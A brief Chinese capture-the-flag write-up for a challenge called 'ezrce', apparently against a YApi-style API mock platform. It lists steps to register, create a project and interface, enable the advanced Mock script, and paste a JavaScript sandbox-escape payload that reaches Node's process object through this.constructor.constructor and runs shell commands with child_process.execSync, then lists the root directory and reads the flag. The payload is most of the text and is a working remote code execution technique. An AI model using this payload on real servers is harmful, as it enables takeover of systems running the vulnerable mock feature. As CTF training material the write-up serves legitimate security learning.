ezrce
打开题目看看
先注册一个账号
进去之后先创建一个项目
再添加一个接口
选择高级Mock,然后选择脚本,点击开启脚本,将payload放上去,点击保存
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()
然后去预览Mock地址
可以看到执行命令了,然后ls /
最后就是查看flag了